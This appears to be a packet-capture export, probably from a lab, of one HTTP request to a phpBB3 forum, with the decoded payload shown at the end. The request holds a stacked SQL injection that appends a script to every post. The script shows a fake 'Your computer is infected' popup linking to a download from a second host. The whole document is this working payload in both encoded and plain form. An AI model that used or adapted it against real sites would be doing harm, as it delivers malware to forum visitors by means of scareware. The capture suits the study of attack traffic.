<packet>
  <proto name="geninfo" pos="0" showname="General information" size="1152">
    <field name="num" pos="0" show="6573" showname="Number" value="19ad" size="1152"/>
    <field name="len" pos="0" show="1152" showname="Packet Length" value="480" size="1152"/>
    <field name="caplen" pos="0" show="1152" showname="Captured Length" value="480" size="1152"/>
    <field name="timestamp" pos="0" show="Aug 26, 2011 12:49:33.444984000" showname="Captured Time" value="1314355773.444984000" size="1152"/>
  </proto>
<proto name="http" showname="Hypertext Transfer Protocol" size="1084" pos="68">
    <field name="" show="[truncated] GET /phpbb3/viewforum.php?f=2;+update+phpbb_posts+set+post_text%3Dconcat(post_text%2C+%27%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%22%2C%20%22%6D%79%77%69%6E%64%6F%77%31" size="947" pos="68" value="474554202f7068706262332f76696577666f72756d2e7068703f663d323b2b7570646174652b70687062625f706f7374732b7365742b706f73745f74657874253344636f6e63617428706f73745f746578742532432b2532372533432537332536332537322536392537302537342533452536442537392535462537372536392536452536342536462537372532302533442532302537372536392536452536342536462537372532452536462537302536352536452532382532322532322532432532302532322536442537392537372536392536452536342536462537372533312532322532432532302532322537332537342536312537342537352537332533442533312532432537372536392536342537342536382533442533342533352533302532432536382536352536392536372536382537342533442533322533352533302532322532392533422536442537392535462537372536392536452536342536462537372532452536342536462536332537352536442536352536452537342532452537372537322536392537342536352532382532322533432536382533312533452532312532312532312535392536462537352537322532302536332536462536442537302537352537342536352537322532302536392537332532302536392536452536362536352536332537342536352536342532312532312532312533432532462536382533312533452532322532392533422536442537392535462537372536392536452536342536462537372532452536342536462536332537352536442536352536452537342532452537372537322536392537342536352532382532322533432536382533322533452534332536432536392536332536422532302537342536462532302533432536312532302536382537322536352536362533442536382537342537342537302533412532462532462533312533392533322532452533312533362533382532452533312533342533372532452533312533332533302532462536342537372536452536432536342532452537412536392537302533452532302536342536462537372536452536432536462536312536342533432532462536312533452532302537392536462537352537322532302536312536452537342536392532442537362536392537322537352537332532302536452536462537372533432532462536382533322533452532322532392533422533432532462537332536332537322536392537302537342533452532372920485454502f312e310d0a">
      <field name="http.request.method" showname="Request Method: GET" size="3" pos="68" show="GET" value="474554"/>
      <field name="http.request.uri" showname="Request URI [truncated]: /phpbb3/viewforum.php?f=2;+update+phpbb_posts+set+post_text%3Dconcat(post_text%2C+%27%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%22%2C%20%22%6D%79%77%69%6E%64" size="932" pos="72" show="/phpbb3/viewforum.php?f=2;+update+phpbb_posts+set+post_text%3Dconcat(post_text%2C+%27%3C%73%63%72%69%70%74%3E%6D%79%5F%77%69%6E%64%6F%77%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%22%2C%20%22%6D%79%77%69%6E%64%6F%77%31%22%2C%20%22%73%74%61%74%75%73%3D%31%2C%77%69%64%74%68%3D%34%35%30%2C%68%65%69%67%68%74%3D%32%35%30%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%31%3E%21%21%21%59%6F%75%72%20%63%6F%6D%70%75%74%65%72%20%69%73%20%69%6E%66%65%63%74%65%64%21%21%21%3C%2F%68%31%3E%22%29%3B%6D%79%5F%77%69%6E%64%6F%77%2E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%3C%68%32%3E%43%6C%69%63%6B%20%74%6F%20%3C%61%20%68%72%65%66%3D%68%74%74%70%3A%2F%2F%31%39%32%2E%31%36%38%2E%31%34%37%2E%31%33%30%2F%64%77%6E%6C%64%2E%7A%69%70%3E%20%64%6F%77%6E%6C%6F%61%64%3C%2F%61%3E%20%79%6F%75%72%20%61%6E%74%69%2D%76%69%72%75%73%20%6E%6F%77%3C%2F%68%32%3E%22%29%3B%3C%2F%73%63%72%69%70%74%3E%27)" value="2f7068706262332f76696577666f72756d2e7068703f663d323b2b7570646174652b70687062625f706f7374732b7365742b706f73745f74657874253344636f6e63617428706f73745f746578742532432b25323725334325373325363325373225363925373025373425334525364425373925354625373725363925364525363425364625373725323025334425323025373725363925364525363425364625373725324525364625373025363525364525323825323225323225324325323025323225364425373925373725363925364525363425364625373725333125323225324325323025323225373325373425363125373425373525373325334425333125324325373725363925363425373425363825334425333425333525333025324325363825363525363925363725363825373425334425333225333525333025323225323925334225364425373925354625373725363925364525363425364625373725324525363425364625363325373525364425363525364525373425324525373725373225363925373425363525323825323225334325363825333125334525323125323125323125353925364625373525373225323025363325364625364425373025373525373425363525373225323025363925373325323025363925364525363625363525363325373425363525363425323125323125323125334325324625363825333125334525323225323925334225364425373925354625373725363925364525363425364625373725324525363425364625363325373525364425363525364525373425324525373725373225363925373425363525323825323225334325363825333225334525343325364325363925363325364225323025373425364625323025334325363125323025363825373225363525363625334425363825373425373425373025334125324625324625333125333925333225324525333125333625333825324525333125333425333725324525333125333325333025324625363425373725364525364325363425324525374125363925373025334525323025363425364625373725364525364325364625363125363425334325324625363125334525323025373925364625373525373225323025363125364525373425363925324425373625363925373225373525373325323025364525364625373725334325324625363825333225334525323225323925334225334325324625373325363325373225363925373025373425334525323729"/>
      <field name="http.request.version" showname="Request Version: HTTP/1.1" size="8" pos="1005" show="HTTP/1.1" value="485454502f312e31"/>
    </field>
    <field name="http.user_agent" showname="User-Agent: curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1\r\n" size="99" pos="1015" show="curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1" value="557365722d4167656e743a206375726c2f372e31382e302028693438362d70632d6c696e75782d676e7529206c69626375726c2f372e31382e30204f70656e53534c2f302e392e3867207a6c69622f312e322e332e33206c696269646e2f312e310d0a"/>
    <field name="http.host" showname="Host: 192.168.147.128\r\n" size="23" pos="1114" show="192.168.147.128" value="486f73743a203139322e3136382e3134372e3132380d0a"/>
    <field name="http.accept" showname="Accept: */*\r\n" size="13" pos="1137" show="*/*" value="4163636570743a202a2f2a0d0a"/>
    <field name="" show="\r\n" size="2" pos="1150" value="0d0a"/>
    <field name="http.request" showname="Request: True" hide="yes" size="0" pos="68" show="1"/>
  </proto>
</packet>

==========================================

2; update phpbb_posts set post_text=concat(post_text, '<script>my_window = window.open("", "mywindow1", "status=1,width=450,height=250");my_window.document.write("<h1>!!!Your computer is infected!!!</h1>");my_window.document.write("<h2>Click to <a href=http://192.168.147.130/dwnld.zip> download</a> your anti-virus now</h2>");</script>')